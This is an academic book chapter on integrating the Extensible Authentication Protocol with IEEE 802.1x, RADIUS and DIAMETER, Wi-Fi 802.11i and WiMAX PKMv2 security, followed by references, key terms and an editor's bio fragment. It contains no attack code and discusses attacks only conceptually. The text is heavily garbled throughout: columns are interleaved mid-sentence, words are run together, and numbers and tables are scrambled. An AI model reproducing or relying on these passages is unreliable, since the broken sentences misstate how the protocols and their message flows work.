Extensible Authentication (EAP)
Protocol Integrations in the
Next Generation
Cellular Networks
Sasan Adibi
Gordon B. Agnew
AbstrAct
Authentication is an important part of the authentication authorization and accounting (AAA) schemes
and the extensible authentication protocol (EAP) is a universally accepted framework for authentication
commonly used in wireless networks and point-to-point protocol (PPP) connections. The main focus of
this chapter is the technical details to examine how EAP is integrated into the architecture of next gen-
eration networks (NGN), such as in worldwide interoperability for microwave access (WiMAX), which
isdefinedintheIEEE802.16dandIEEE802.16estandardsandincurrentwirelessprotocols,suchas
IEEE 802.11i. This focus includes an overview of the integration of EAP with IEEE 802.1x, remote au-
thentication dial in user service (RADIUS), DIAMETER, and pair-wise master key version (2PKv2).
IntroductIon limited to wireless local area networks (LANs),

they could be used for authentication in wired-
Extensible authentication protocol (EAP) is a based LAN applications. However EAP is most
universally accepted authentication mechanism, often used in wireless LANs. The integrations
frequently used in different wireless technologies. of EAP and other security protocols and mecha-
Although the applications of EAP protocol are not nisms often result in strong security frameworks.
Extensible Authentication (EAP) Protocol Integrations in the Next Generation Cellular Networks
These integrations are often established with controlling user traffic for protecting network
other security protocols and mechanisms, such IEEE 802.1x also offers dynamically varying
as transport layer security (EAP-TLS), message encryption keys. IEEE 802.1x uses EAP in both
digest 5 (EAP-MD5), privacy key management wired and wireless LANs and supports multiple
(PKM-EAP), and so forth. authentication methods, such as Kerberos, one-time
The organization of the sections of this chap- passwords,andpublickeycertificates.Ourmain
ter is as follows: Section II will discuss details focus is on wireless technologies.
about the EAP-IEEE 802.1x interactions. Section IEEE 802.1x initially starts the communications
III is dedicated to remote authentication dial in by an attempt to connect with an authenticator
user service (RADIUS) and DIAMETER in the (i.e., an 802.16 or 802.11 access point [AP]) to
authentication/authorization schemes. Section IV authenticate an unauthenticated supplicant. The
talks about the IEEE 802.1x-EAP functions imple- AP responds back by enabling a port for pass-
mented in Wi-Fi (IEEE 802.11i) and introductions ing only EAP packets between the clients to the
to EAP-MD5, lightweight extensible authentication authentication server, which is usually located on
protocol (LEAP), EAP-TLS (TTLS) and protected the wired side of the AP. The AP blocks all other
extensible authentication protocol (PEAP). Section traffici. ( e.HTTP
, anddynamichostconfiguration
V presents the PKMv2-EAP scheme in worldwide protocol [DHCP] packets), until the AP (authen-
interoperability for microwave access (WiMAX) ticator) is able to verify the client’s identity using
(IEEE 802.16) followed by section VI, which is a an authentication server (e.g., DIAMETER or
configuredtestbedforaWiMAXsystem.Sections RADIUS). Once authenticated, the AP opens the
VII and VIII contains conclusions and references client’sportfortherestoftraffictypes.
respectively. To better understand how 802.1x operates, the
interactions mentioned in Table 1a usually happen
between various 802.1x elements.
EAP And IEEE 802.1x As showed in Figure 1, EAP is an important
component of an 802.1x-based infrastructure. EAP
Based on RFC 3748 (Aboba, Blunk, Vollbrecht, improves the authentication scheme provided by
Carlson, & Levkowetz, 2004), EAP runs on top the point-to-point protocol (PPP) (RFC 1661). EAP
of IEEE 802.1x (Figure 1), therefore 802.1x is the provides PPP with a generalized framework for
key issue to understanding the EAP. IEEE 802.1x
offers a strong framework for authenticating and
Figure 2. Different layers of 802.1x (Adapted from

Leira,205)
Figure 1. 802.1x authentication components

(Adapted from Kwan, 2003)

Table 1a. A summary of EAP messages in a supplicant-authenticator-authentication server scenario

AP (ACCESS POINT) AUTHENTICATION
SUPPLICANT AUTHENTICATOR SERVER
1. Sends EAP-start message Receives the message
2. Replies with an EAP-request ID
Verifies the client’s identity using
3. EAP-response with ID Digital Certificates, etc
4. Receives Accept/Reject message Sends Accept/Reject to the AP
5. Receives Accept/Reject note Sends Accept/Reject notification
6. If accepted, port is open AP forwards the messages
And messages are accepted to the Authentication Server
7. If rejected, the end
various types of authentication schemes (Chen & operates in the following fashion (Piscitello, 2005)
Wang,The
. )05 2 x1 2.08 standardincludesadefi - (see Box 1).
nition of EAP encapsulation for Ethernet packages In a true end-to-end secure wireless network,
used over LANs, which is called EAP over LAN it is not only crucial that the authenticator and
(EAPOL). Figure 2 (Leira, 2005) shows various authentication server ensure user's legitimacy,
layers of selective authentication and network but also the supplicant has to be confident tha
type 802.1x. the authentication server and the authenticator
There are three main components found in arelegitimateandnotspoofingdeviceswhotryto
802.1 X-based systems:
• Supplicant, which is the client/user

Figure 3. The supplicant-authenticator-authentica-
• Authenticator, which is the mediator between
tion server relationship
the client and the Authenticator Server
• Authenticator Server, which determines if the
client (supplicant) has the correct information
for authentication. This could be a RADIUS
or a DIAMETER server
In most cases, both supplicant and the authen-

tication server have relatively more processing ca-
pabilities than the authenticator. The authenticator
is mostly responsible for forwarding, therefore it
requires less power as compared to the other two
components. An AP can serve well as the role of
an authenticator, which makes the system well
suited for wireless networks.
Figure 3, which has more details compared to
Table 1a, shows how the communication between
the supplicant, authenticator, and the authentication
server works. Initially the authenticator blocks all
trafficexceptfortheEAPOL-basedtraffic.Therest
of the communication process is similar to that of
Table 1a. As shown in Figure 3, the EAP scheme

Box 1.
# Process Taking Place Message Transmitted/State
1. Supplicant tries to connect to the authenticator (AP) 8 0 2.1 x A s s o c i a t e
Request
2. Authenticator detects supplicant and enables client’s port Por t s et t o
Unauthorized
3. Authenticator returns a response to supplicant and waits 8 0 2.1 x A s s o c i a t e
Response
4. Supplicant transmits a message to authenticator EAP-START
5. Authenticator replies a message to supplicant, asks for identity EAP-REQUEST IDENTITY
6. Supplicant provides its identity to authenticator EAP-RESPONSE
7. Authenticator forwards EAP-RESPONSE to authentication server FORWARD EAP-RESPONSE
8. Authentication server authenticate clients Authenticates
via EAP-TLS, LEAP
9. If accepted by authentication server, signals to authenticator ACCEPT
10. If rejected by authentication server, signals to authenticator REJECT
11. If authenticator receives acceptation, responds to supplicant Supplicant can use the wireless EAP SUCCESS
LAN Port set to AUTHORIZED
12. If authenticator receives rejection, responds to supplicant EAP FAILURE
Supplicant remain blocked from the wireless LAN Port state no change
13. If client succeeded, authenticator passes global key to client Global Key Passed
14. When client terminates session, it logs off EAP LOGOFF
obtain the user name and password from the user. are authentication, authorization, and accounting
This scenario can be prevented by using a mutual (AAA) protocols for applications and mechanisms
authentication scheme where the authentication used in network access or Internet protocol (IP)
server and the authenticators also have to be au- mobility. They are intended to work in both local
thenticated by the supplicant. Examples of such and roaming situations.
mutual authentication schemes are used in TLS, Many applications running through ISPs using
tunneled TTLS (TTLS), LEAP, and PEAP. modems, DSL, cable, or wireless connections re-
IEEE 802.1x also provides a framework to require some sort of user name/password for access
duce or eliminate the danger of session hijacking permission. This information is usually transmitted
and man-in-the-middle (MITM) attacks, however to a RADIUS server, over a network access server
it requires that the right type of authentication (NAS) device using the point-to-point protocol
(mutual authentication) be used. Secure authenti- (PPP) and the RADIUS protocol. The RADIUS
cation does not yet imply secure communication. server verifies that the information is corre
A strong encryption method is required to ensure This is done using authentication schemes, such
data confidentiality. EAP enables the as,usage
passwordofauthentication protocol (PAP), chal-
different types of encryption with dynamic key lenge handshake authentication protocol (CHAP),
distribution techniques. or EAP. If authentication and authorization are
accepted, then the server will authorize access to
the ISP network and select an IP address and other
rAdIus And dIAMEtEr access control parameters (L2TP parameters).
TheRADIUSserverisalsonotifiedof- anyses
Both RADIUS (Hill, 2001) and DIAMETER (Cal- sion start-stop for related accounting, billing, and
houn, Loughney, Guttman, Zorn, & Arkko, 2003) other statistical issues. RADIUS is an extensible

protocol in which most RADIUS vendors have their a request to the wireless station, asking for its
own hardware and software implements. identity and relays the message to an AAA server
The DIAMETER protocol is proposed to reusing a RADIUS-based access-request user name
place RADIUS and it is designed to be backward message.
compatible in most cases. The main differences As expected, through the AP, the wireless sta-
between DIAMETER and RADIUS protocols tion and the AAA server establish the authentication
are, (see Box 2). process by exchanging RADIUS access-chal-
The message format and the authentication lenge and access-request messages. According to
ows
fl inDIAMETEREAPapplicationsaregiven the specific EAP type, an encrypted TLS tunnel
in Figures 4 and 5. could be used to convey the messages inside of
the tunnel.
Applying rAdIus to wireless lAns If an access-accept message is sent by the AAA
server, the wireless station and the AP establish
In wireless-based networks that use 802.1x port a handshake. This generates session keys that are
access control, the wireless station is a remote user used by either temporal key integrity protocol
and the wireless AP behaves as the network access (TKIP) or wired equivalence privacy (WEP) to
server (NAS) (Phifer, L 2., 2003). The IEEE 802.11- encrypt data. At this point, the port is unblocked
based protocols (a, b, or g) are used to associate by the AP and the wireless station is able to send
the wireless stations to the wireless APs. and receive data to and from the attached LAN.
Once the client is associated, it transmits an If an access-reject message is sent by the AAA
EAP-Start message to the AP. The AP sends server, the client will be disassociated by the AP.
Box 2.
# DIAMETER uses: RADIUS uses:
1. Reliable transport protocol (TCP or Uses an unreliable transport protocol (UDP)
stream control transmission protocol [SCTP])
2. End-to-end transport level security protocols End-users, such as, CHAP and PAP
(IPSec or TLS)
3. Transition support for RADIUS No direct compatibility with DIAMETER
4. Large address space for AVPs (attribute value Smaller address space – 8 bits
pairs) – 32 bits
5. A peer-to-peer protocol scheme Client-server protocol scheme
Server-initiated messages support Request/response scheme only
6. Both stateful and stateless models Only a stateless model
7. DNS (dynamic name system), SRV (generalized Static Discovery agents
service location), and NAPTR (naming authority
pointer), for dynamic discovery of peers
8. Capability Negotiation (version, applications, etc) No such built-in capability
9. Application layer acknowledgements and built-in No such failover mechanism
Failover (device-watchdog request/
device-watchdog answer [DWR/DWA])
10. Errornotification Nosuchnotification
11. Better roaming support Averagesupportforfixedandroamingusers
12. Better extended command and attributes Average command and attributes
13. Better Mobile-IP supports and stronger security Average security options
0
Figure 4. DIAMETER message format (Adapted Figure 5. Authentication flows in diameter EAP
fromWu,Chen,Chen,&Fan,205) applications (Adapted from Wu, Chen, Chen, &
Fan,205)
At this point, the failed supplicant can try the

authentication process again, however it is pre-
vented by the AP from data packet transmissions.
It should be noted that the failed client is still able EAP-MD5 (RFC 1994): The EAP-MD5 protocol
to listen to the transmitted data across the wireless lets a RADIUS server authenticate LAN stations
channel. This raises the importance of encryption throughMD5hashverificationforeach - user/pass
techniques for privacy over the air. word. For a trusted Ethernet, this is a simple and
The AAA server uses the attribute-value pairs, reasonable choice where there is little risk of an
which are included in the RADIUS messages. outsider active attack or sniffing. EAP-MD5, on
This is to deliver session parameters to the wire- the other hand, is not suitable for wireless LANs
less station via the AP, such as, session-timeout or public Ethernets, since the station identities and
or VLAN tag (Tunnel-Private- Group-ID=tag,passwordhashesarepronetoeasyoutsidesniffing.
Tunnel-Type=VLAN). The additional informa - A man-in-the-middle attack or session hijacking
tion, which can be delivered and used, depends could also be an issue. EAP-MD5 is able to protect
on the AAA Server, AP, and the wireless station the message exchange ow fl through creating a
settings. unique digital signature,” which authenticates each
packet using this to ensure authenticity for the
EAP messages. EAP-MD5 has light computational
EAP and different Authentication weight and this increases it's timing performance,
Methods which makes it fairly easy to implement and con-
figure. EAP-MD5 does not use public key infra -
EAP by itself cannot protect the authentication structure (PKI) certificates for validating clien
message exchange between the client, authentica- nor does it provide strong encryption for protecting
tor, and authentication server. In order to secure the authentication messages between the suppli-
the message exchange, an EAP authentication cant and the authentication server. EAP-MD5 is
protocol is necessary. The commonly used EAP most suitable for the EAP message exchanges in
authentication protocols include (Kwan, 2003; wired networks where the EAP client is directly
Phifer, 2003; “What are Your EAP Authentication connected to the authenticator. In this case, the
Options?,”: )052 chances for message interception and eavesdrop-

ping are relatively very low. Therefore for wire- the client to be authenticated by the authentication
less 802.1x authentication schemes, stronger and server through a user name/password process and
more robust EAP authentication protocols should onlyrequiresacertificateusedbytheauthenti
be deployed. tionserver.EAP-TTLSsimplifiestherolloutand
maintenance procedures while retaining strong se-
EAP with transport layer security (EAP-TLS): curity and relatively strong authentication scheme.
EAP-TLS is discussed in RFC 2716, which is the A TLS tunnel is used for protecting EAP messages
only secured standard option (along with EAP- and for reusing existing user credential services
TTLS) designed for wireless LANs. EAP-TLS for 802.1x authentication, such as RADIUS, ac-
mandates a procedure in which the station and the tive directory, and LDAP. AP-TTLS also provides
RADIUS server are both required to prove their backward compatibility for other authentication
identities using public key cryptography (i.e., se- protocols, such as, PAP, CHAP, MS-CHAP, and
curitytokens,smart-cards,ordigitalMS-CHAP-V2. certificates) . tunnels are not used, EAP-
If TLS
This procedure is secured by an encrypted TLS TTLS is not considered secure and can be fooled
tunnel, which makes EAP-TLS very resilient to into revealing identity credentials. EAP-TTLS
against dictionary, man-in-the-middle, and other is most suitable for infrastructures that require
types of attacks. However, the station’s identity, strong authentication without mandating the use of
whichisthenameattachedtothecertificate, can
mutualcertificates. Wirelessx1 .208 authentication
still be sniffed through eavesdropping. EAP-TLS schemes usually support EAP-TTLS.
is a very attractive candidate for large enterprises,
which only use Windows (2000/2003/XP)-based Protected EAP (PEAP): PEAP is an Internet-draft
applicationswithdeployedcertificates. EAP-an
(still not TLSRFC), which is similar to EAP-TTLS in
provides strong security schemes by requiring terms of supporting mutual authentication. PEAP
both client and authentication server (mutual au- is currently being supported by Cisco Systems,
thentication) to be authenticated and authorized RSA Data Security Inc., and Microsoft. PEAP is an
byusingPKIcertificates.Thisworkswellauthentication within protocol alternative to EAP-TTLS,
802.1x authentication schemes as the TLS tunnel which overcomes EAP weaknesses through:
between the client and the authentication server
protects the EAP messages from sniffing a. and Protecting user credentials
eavesdropping. The only notable drawback of b. SecuringEAPnegotiationows fl
EAP-TLS is the requirement of PKI certificates c. Standardizingkeyexchangeows fl
on both sides (clients and authentication servers). d. Supporting fragmentation and reassembly
This causes complications in roll-out and main- procedures
tenance procedures and increases the amount of e. Supporting fast reconnects
overheadtoestablishasecurelinkascertificates
can be quite large. Figure 6 shows the EAP-TLS PEAP allows the utilization of other EAP-based
messageow. fl authentication protocols and securing the transmis-
sion through utilizing a TLS encrypted tunnel.
EAP with tunnelled TLS (EAP-TTLS): EAP- PEAP relies on the TLS keying method for the key
TTLS is an extension of EAP-TLS, which provides creation and exchange mechanisms. The PEAP
thebenefitsofastrongencryptionscheme clientwithout
is authenticated directly with the back-end
thecomplexityofmutualcertificateson bothsides
authentication server. The authenticator acts as a
(client and authentication server). Similar to the pass-through device, which does not require much
EAP-TLS scheme, EAP-TTLS scheme supports processing power or manipulation and needs little
mutual authentication, however it only requires the understanding of the EAP authentication protocol
authentication server to be validated to the client mechanism. Unlike EAP-TTLS, PEAP does not
using a certificate exchange. EAP-TTLS allows support inherent username and password authen-

tication against an existing user (unlike LDPA). module (SIM), or EAP-SIM, is an EAP-based
To support this, every specific vendor has its
mechanism used for authentication and session
own feature built on top of the protocol. PEAP is key distribution, which is used in the GSM-SIM.
most suitable for infrastructures, which require EAP-SIM is described in RFC 4186.
strong authentication without the use of mutual Tables 1b and 2 show summaries and com-
certificates,similartoEAP-TTLS.Wirelessparisons x1 .208 between all mentioned EAP-based
authentication schemes usually support PEAP. protocols.
Dependingonthespecific EAP authentication
Cisco’s lightweight EAP (LEAP): LEAP goes protocol used, IEEE 802.1x authentication proto-
beyond EAP-MD5 in addressing the security is- col can help to solve the following security issues
sues of wireless networks by delivering the keys (Kwan, 2003):
used for WLAN encryption and requiring mutual
authentication. Mutual authentication reduces the • Dictionary attack: In this type of attack, the
risk of an attacker posing as an AP (MITM at- attacker obtains the challenge/response mes-
tack). However, station identities and passwords sage exchange from a password authentication
remain vulnerable to dictionary sniffingsession attacks.and uses a brute force mechanism to
LEAP is mostly used when Cisco-based APs find the password. IEEEx1 2.08 solves this
and cards are involved. LEAP mandates mutual type of attack by using TLS-based tunnels
authentication between the client and the authen- for protecting credential exchanges among
ticator. The client first has to authenticate itself
authenticator and supplicant.
to the authenticator and then the authenticator • Session hijack: In this attack, the attacker is
should authenticate itself to the client. If the two able to sniff the packets passed between the
authentication procedures are done successfully, a client and the authenticator and to recover the
network connection is granted. Unlike EAP-TLS, client’s identity information. This pushes the
LEAP is username/password-based and is not based “legitimate” client out of the scope through
on PKI certificates. This simplifies roll-out a and
form of denial-of-service (DoS) attack
maintenance procedures. Being the proprietary and impersonates the client to continue the
to Cisco is one of the drawbacks of LEAP, which conversation with the authenticator (DoS and
is the reason it has not been widely adopted by session hijacking). IEEE 802.1x can thwart
other networking vendors. LEAP is most suitable the session hijacking through its ability to
for wireless scenarios that support Cisco AP’s and securely authenticate with dynamic session-
LEAP compliant wireless NIC cards. based keys.
• Man-in-the-middle: The MITM attack
EAP-SIM: The EAP method for global system for happens in one-way authentication or unbal-
mobile communications (GSM) subscriber identity anced schemes, where the attacker obtains the
necessary information from the client and/or
Table 1b. Comparison between different EAP methods in terms of client/server strength (Adapted from
Phifer, 2003)

the authenticator and comes in the middle of Figure6.MessageflowofEAP-TLS

the session and becomes the “middle man.”
Through IEEE 802.1x’s authentication and
dynamic session-based keys, the encryption
of the data stream between the client and au-
thenticator can prevent this type of attack.
IEEE 802.11I - wlAn sEcurIty

stAndArd IMPlEMEntAtIon
The IEEE 802.11i standard was designed to provide

secure communications in wireless LANs, which
ispartoftheIEEEspecifications.
1 2. 0 8 Formany
years, WEP was used as a WLAN security tech-
nology. However, WEP has been proven not to be
secure with today’s computational power due to
the short period of the stream cipher used and how
key stream reuse allows the data to be recovered (to
name a few). IEEE 802.11i enhances the encryption,
authentication, and key management schemes of
WEP. IEEE 802.11i is based on a strong security
scheme, the Wi-Fi protected access (WPA). wPA2 and 802.11i
wPA in 802.11i WPA2 is the second generation of WPA security
introduced by the Wi-Fi Alliance (Lehembre,
WPA is a subset of IEEE 802.11i, the standard for 2005). It is consisted of:
WLAN security, and consists of the followings:
• An authentication mechanism that uses IEEE
• An authentication mechanism that uses IEEE 802.1x or pre-shared keys scheme.
802.1x or pre-shared keys scheme. • An encryption mechanism, which uses ad-
• An encryption mechanism, which uses vanced encryption standard (AES), per IEEE
temporal key integrity protocol (TKIP), per i
1 2.08 definition.
IEEEi
1 2.08 definition.TKIPcouldbesoft -
ware-based offered by products that support WPA2 with AES is eligible for FIPS 140-2
WEP. specified
( by the United States Government’s
[NIST] and uses four level of securities) compli-
Table 2. Comparison among various EAP methods in terms of wireless security strength (Adapted from
“WhatareYourEAPAuthenticationOptions?,”205)

ance. WPA2 is a requirement for Wi-Fi compliance ter with cipher block chaining message
from 2006. authentication code (CCMP). CCMP
uses the AES encryption scheme.
EAP Method requirements for TKIP offers three advantages over
wireless lAns WEP:
 Longer initialization vector (IV),
RFC 4017 (Stanley, Walker, & Aboba, 2005) which minimizes the chance ses-
specifiestherequirementsforEAPmethodsused sion key reuse
in IEEE 802.11-based systems, which uses IEEE  Key hashing, which results in a
802.11i for authentication and authorization. This different key used for each data
in turn could be applied to IEEE 802.16 as well. packet
802.11i MAC security enhancements makes use of  MIC, which ensures that the mes-
both IEEE 802.1x and EAP. Today’s deployments sage is not altered during the com-
of IEEE 802.11 wireless LANs are based on EAP, munication between sender and
integrated with several EAP methods, namely: receiver
EAP-TLS, EAP-TTLS, PEAP, and EAP-SIM, • Counter-mode/CBC-M AC protocol
which were discussed before. These methods sup- (CCMP): CCMP is similar to TKIP, in which
port authentication credentials, including digital it deals with the confidentiality of data, as
certificates , secure tokens, usernames/passwords, well as authentication and encryption. One
and SIM secrets. of the differences between CCMP and TKIP
IEEEi
1 .208 specifiestheusageofEAPforboth is the fact that CCMP uses AES in counter
authentication and key exchange among the EAP modefordataconfidentiality.The - otherdif
peers and servers. RFC 3748 (RFC 3748 - EAP) ference is the usage of cipher block chaining
outlines the EAP usage within IEEE 802.11i, which message authentication code (CBC-MAC)
is subject to threats, given that WLAN provides for authentication and integrity. In the ar-
ready access to any attacker within range. chitecture of 802.11i, CCMP uses a 128-bit
The following four components are integral key scheme. CCMP provides protections for
partsofIEEEi 1 2.08 specifications(IEEEi:
1 2.08 somefields,whicharenotencryptedthrough
WLAN Security Standards,” 2006): a mechanism, which is so-called additional
authentication data (AAD). AAD protection
• Temporal key integrity protocol (TKIP): includes a scheme which prevents attackers
TKIP is a protocol which uses an RC4 ci- from replaying packets to various destina-
pher for encryption of data and deals with tions.
confidentiality of data. TKIP improves the • IEEE 802.1x: IEEE 802.11i is a wireless
security weaknesses of WEP. It uses a mes- implementation of 802.1x, which offers an
sage integrity code, called “TKIP-Michael effective framework to authenticate and
algorithm,” which authenticates end devices control user traffic and also offers - dynami
for legitimacy. TKIP utilizes a mixing func- cally varying encryption keys. Through this
tion to overcome weak-key and brute-force component (802.1x), 802.11i is able to get tied
attacks. TKIP is used in 802.11i during two to EAP.
phases: • EAP encapsulation over LANs (EAPOL):
° First phase: Inthefirstphase,TKIPis As discussed in Figure 2, EAP layer covers
used together with an improved message EAPOL, which is a key protocol in IEEE
integrity check (MIC). This is to stop 802.1x for key exchange. Two main schemes
data manipulation. covered in the EAPOL-key exchanges are
° Second phase: In the second phase, definedinIEEEi, 1 2.08 whicharethe4way -
TKIP and MIC are replaced with coun- handshake and the group key handshake.

PkMv2-EAP scHEME In wIMAx the IEEE 802.16 standard; PKM version 1 (PKMv1)
(IEEE 802.16) and PKM version 2 (PKMv2). PKMv1, which is
a one-way authentication method, is proven to be
WiMAX (IEEE 802.16) stands for worldwide prone to variety of attacks and is not covered in
interoperability for microwave access, which is this chapter. PKM supports two authentication
maintained by the WiMAX Forum. WiMAX has protocol mechanisms:
similarities with Wi-Fi; however it claims to achieve
higher bandwidth (up to 70 Mbps) over a 70 mile . 1 RSApublickey-basedcertificates,mandatory
(+110 km) range, which outperforms Wi-Fi. There in all devices
are also some similarities between the security 2. EAP
schemes between WMAX’s and IEEE 802.11i.
In this section, the security mechanisms for Authorization via PkM rsA
WiMAX are described. For an end-to-end authen- Authentication Protocol
tication scheme, WiMAX uses extensible authen-
tication protocol with privacy key management Figure 7 shows the authorization and authentication
(EAP-PKM), which relies on the transport layer processes of PKMv2 protocol using a request/grant
security (TLS) standard and public key cryptog- access method. For a SS (PKM client) to have
raphy (“WiMAX Technology,” 2005). PKM is access to the BS network, the PKM server has to
a protocol, which uses the Rivest, Shamir, and authorize the connection and the SS also needs to
Adleman (RSA) public-key scheme, X.509 digital authenticate the BS; after that, the SS will have
certificates,andastrongencryptionscheme security for theenabled. Once the SS associates
features
subscriber station (SS)-base station (BS) interac- with the BS, the SS shares a private encryption
tions. There are two PKM protocols supported in key with the BS and communication between
Figure 7. PKMv2 authentication and authorization process (Adapted from Adibi, Bin, Ho, Agnew, &
Erfani,206)

the BS and SS can be initiated using encrypted zation, which prevents attackers from gather-
messages. ing enough data to launch cryptanalysis.
5. To correct replay attacks, it is recommended
Authorization via PkM Extensible to add a random value transmitted from BS
Authentication Protocol and SS for SA authorization.
6. WiMAX security supports two strong en-
After the SS is associated to the BS, the EAP au- cryptions algorithms; triple data encryption
thorization procedure starts. Figure 8 shows the standard (3DES) and AES, which are con-
EAPauthorizationandauthenticationow fl sidered
steps:leading edge (AES in particular).
7. The ability of an SS to cache or transfer the
security Analysis of wiMAx master key to avoid a full reauthentication
procedure.
Authentication
8. EAP-PKM relies on the TLS standard that is
based on public key cryptography, which is
The EAP-PKM is intended to secure WiMAX cli-
costly for some wireless vendors. Therefore,
ents and servers in a more robust way. The following
a high performance security processor is
list summarizes the strength of EAP-PKM:
dedicated to BS in WiMAX, which enables
the implementation of a complicated authen-
1. PKMv2 supports mutual authentication,
tication system in WiMAX.
which can prevent man-in-the-middle at-
tacks.
In this section, a WiMAX-based authentication
2. TheX.digital
09 5 certificateissuedforeach
using EAP-TLS and EAP-PKM were presented.
SS is unique and cannot be easily forged.
This included the PKMv2 handshaking schemes.
3. Each service has a unique security associa-
It is believed that WiMAX possesses more ex-
tionidentifierSAID) ( therefore
, ifoneservice
tensive security power compared to the ones in
is compromised, the other services are not
Wi-Fi, which in turn will favor WiMAX in the
affected.
comparative market share.
4. The limited lifetime of authorization key (AK)
provides key-refresh and periodic reauthori-
Figure8.0216eEAPauthenticationprocess(AdaptedfromAdibietal.,206)

conclusIon is not affected by the EAP packet's contents.

This may pose as vulnerability manipulations
In this chapter, to help address the security issues and different attacks. Throughout this chapter,
of unauthorized access, The development of IEEE where appropriate, the application of EAP
802.1x was to provide a standard authentication using different authentication/authorization
mechanism in port-based scenarios. EAP, on the methods for wireless applications, were dis-
other hand, offers supports to a variety of stan- cussed. Special attention was given to EAP-
dard authentication messaging protocols. EAP TLS and EAP-PKMv2 for 802.16e systems.
provides multivendor solutions to support network
authentication framework. Additional EAP types,
including EAP-SIM and EAP-SecurID (which rEfErEncEs
supportshardwaretokens)are , alsodefined.EAP
specifiesthemethodinwhichsupplicant/ - Aboba,authen
B., Blunk L., Vollbrecht, J., Carlson, J., &
ticator/authentication server interact and the type Levkowetz, H. (2004, June). Extensible authentica-
of standard messaging exchanged between them. tion protocol (EAP) (RFC 3748).
EAP, however does not specify the actual authen-
Adibi, S., Bin, L., Ho, P. H., Agnew, G. B., & Er-
tication protocol. Therefore, EAP's advantages can
fani, S. (2006, May). Authentication authorization
be summarized as:
and accounting (AAA) schemes in WiMAX. Paper
presented at the Conference on Electro/information
• EAP permits multiple authentication proto-
Technology (EIT’06).
cols without extra setup steps.
• EAP is exible
fl and supports multiple au- P., Loughney, J., Guttman, E., Zorn, G.,
Calhoun,
thentication protocols without the necessity & Arkko, J. (2003, September). Diameter base
of requiring to match an authenticator to protocol (RFC 3588).
a specific authentication mechanism. EAP
permits the authentication server to selects Chen, J. C., & Wang, Y. P. (2005, December). Ex-
the best suitable authentication protocols, tensible authentication protocol (EAP) and IEEE
which is supported on the client, as well as 802.1x: Tutorial and empirical experience. 43(12),
itself. This is usually done without the need supl.26-supl.32.
for fully configuring the authenticator with
Hill, J. (2001). An analysis of the RADIUS authen-
the authentication protocol. In this scenario, tication protocol. InfoGard Laboratories.
the authenticator acts as a pass-through device
(pass-through is optional). IEEE 802.11i: WLAN Security Standards. (2006).
• The authenticator has the ability to act as a Javvin Technologies, Inc. Retrieved October 25,
pass-through device for non-local clients and 2007, from http://www.javvin.com/protocol80211i.
at the same time, authenticate local clients html
using authentication protocols it may not Kwan, P. (2003, May). 802.1x authentication &
support locally. extensible authentication protocol (EAP) (White
• The existence of a separate authenticator and Paper).
authentication server operating in the pass-
through mode, permits simplifications Lehembre, ofG. (2005, December). Wi-Fi security
the credentials and development of standard – WEP, WPA and WPA2. Retrieved October 25,
messaging protocols. The authenticator is re- 2007, from http://www.hsc.fr/ressources/articles/
sponsible for determination of the outcome hakin9_wifi/hakin9_wifi_EN.pdf
of the authentication from the access-accept
Leira, J. (2005, April 15). WLAN - IEEE 802.1x.
or reject message provided by the authentica-
The Norwegian Research Network (UNINETT).
tion server. The outcome of the authentication

Phifer, L. (2003, September). Deploying 802.1X for DHCP:Dynamichostconfigurationprotocolis

WLANs: EAP types. Retrieved October 25, 2007, a protocol that automatically manages (temporarily
fromhttp:www. / wi-fiplanet.com/tutorials/assign article.
and release) IP addresses to devices on the
php/3075481 network (wireless and wired).
Phifer, L 2. (2003, September). Applying RA- EAP: Extensible authentication protocol is a
DIUS to Wireless LANs, using RADIUS For universally famous authentication protocol ac-
WLAN Authentication, Part I. Retrieved from cepted framework for authentication. Its integra-
http://www.wi-fiplanet.com/tutorials/article. tion with other security schemes usually produces
php/10724_3114511_1 strong frameworks for various wireless and wired
applications.
Piscitello, D. M. (2005, April 16). IEEE 802.1x and
EAP primer. Core Competence, Inc. MD5: Message-digest algorithm 5 is a 128-bit
hash function, which is a widely used cryptographic
Stanley, D., Walker, J., & Aboba, B. (2005, March).
element. MD5 has shown some weaknesses; there-
Extensible authentication protocol (EAP) method
fore it is not counted a robust scheme nowadays.
requirements for wireless LANs (RFC 4017).
PEAP: Protected EAP is a security method
What are Your EAP Authentication Options?
which transmits authentication information, in-
(2005, May). InteropNet labs full spectrum secu-
cluding passwords. PEAP can be used in variety
rity initiative. Retrieved October 25, 2007, from
of scenarios including wireless and wired topolo-
http://www.opus1.com/nac/whitepapers-old/04-
gies.
EAP_OPTIONS-LV05.PDF
PKM: Privacy key management is a private
WiMAX Technology. (2005). Retrieved October
key scheme used with EAP and TLS for provid-
25, 2007, from http://ww.hifn.com/docs/WiMAX_
ing end-to-end security schemes for wireless
AB_1.4.pdf
technologies.
Wu, W. T., Chen, J. C., Chen, K. H., & Fan, K.
RADIUS: Remote authentication dial in user
P. (2005). Design and implementation of WIRE
service is an AAA protocol that works in a cli-
diameter. Paper presented at the 3rd International
ent/server application scenario. RADIUS oversees
Conference on Information Technology: Research
the authentication and authorization scheme of
and Education, ITRE 2005.
the session established between two entities. It is
further updated by DIAMETER.
TLS: Transport layer security is used mostly
kEy tErMs in client/server applications, which require end-
point authentication and communications privacy,
AP: Access point (or wireless access point) is a particularly over the Internet. This is mostly done
device that connects wireless devices (i.e., mobile using cryptographic measures.
users [MUs], laptops, etc.) together. APs are usually
connected to another device called wireless control- WiMAX: WiMAX stands for worldwide
ler (WC). A wireless network is usually comprised interoperability for microwave access, which has
of a WC and a few APs, servicing MUs. been defined by the WiMAX Forum, formed in
2001. WiMAX is also known as IEEE 802.16
DIAMETER: DIAMETER is an authentica- standard,officiallytitledWirelessMANandisan
tion, authorization, and accounting (AAA) proto- alternative to DSL (802.16d) and cellular access
col, an updated version of RADIUS. (802.16e).

About the Contributors
Yan Zhang received the PhD degree in School of Electrical & Electronics Engineering, Nanyang
Technological University, Singapore. From August 2004 to May 2006, he worked with the National
Institute of Information and Communications Technology (NICT), Singapore. Since August 2006, he
has worked with Simula Research Laboratory, Norway (http://www.simula.no/). He is on the editorial
board of the International Journal of Network Security. He is currently serving as the Book Series Edi-
tor for the book series, Wireless Networks and Mobile Communications (Auerbach Publications, CRC
Press, Taylor, and Francis Group). He is serving as co-editor for several books: Resource, Mobility and
Security Management in Wireless Networks and Mobile Communications; Wireless Mesh Networking:
Architectures, Protocols and Standards; Millimeter-Wave Technology in Wireless PAN, LAN and MAN;
Distributed Antenna Systems: Open Architecture for Future Wireless Communications; Security in
Wireless Mesh Networks; Mobile WiMAX: Toward Broadband Wireless Metropolitan Area Networks;
